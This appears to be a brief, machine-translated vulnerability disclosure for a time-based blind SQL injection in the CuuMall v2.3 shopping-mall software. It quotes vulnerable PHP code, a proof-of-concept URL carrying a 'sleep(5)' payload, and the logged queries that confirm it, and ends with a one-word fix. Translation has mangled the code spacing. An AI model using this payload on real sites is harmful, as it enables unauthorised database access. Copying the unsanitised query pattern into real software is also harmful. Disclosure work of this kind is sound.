CuuMall latest SQL Injection

CuuMall latest SQL Injection

CuuMall latest SQL Injection

It seems that the CuuMall official website file has been changed or is itself a bug. If you don't talk about it, check the Code directly.
 

DetailsAction. class. php (282-313) public function add_pru () {$ coo = new Cookie (); if ($ coo-> is_set (c ("GUESTCOOK "). "mall-m-name") {$ this-> assign ("waitSceond", 3); $ this-> assign ("jumpUrl ", "_ APP _/Home/login"); $ this-> error ("add to favorites after Logon"); exit ();} $ id = $ _ GET ['id']; if (is_numeric ($ id) {$ this-> assign ("waitSceond", 3 ); $ this-> assign ("jumpUrl", "_ APP _"); $ this-> error ("invalid parameter"); exit ();} $ addpru = new Model ("m_add"); $ d_addpru = $ addpru-> where ("pruid = ". $ id)-> find (); if (empty ($ d_addpru )){

The parameter is invalid if it is determined to be a number. It should be a non-digit according to the normal logic.



Result

$ D_addpru = $ addpru-> where ("pruid =". $ id)-> find (); blinded



Access url:

192.168.10.70/cuumall_v2.3/v2.3/mall_upload/index. php/home/detail/index/id/2 and sleep (5 )#



Delayed response !!!



View the database SQL captured in the background

2014/9/30 10: 37 SELECT * FROM 'cuu _ sell_id 'WHERE pro_id = 1 and sleep (5)

2014/9/30 10: 37 SELECT * FROM 'cuu _ pl_id 'WHERE pro_id = 1 and sleep (5)

A bunch of sleep
 

Solution:

Filter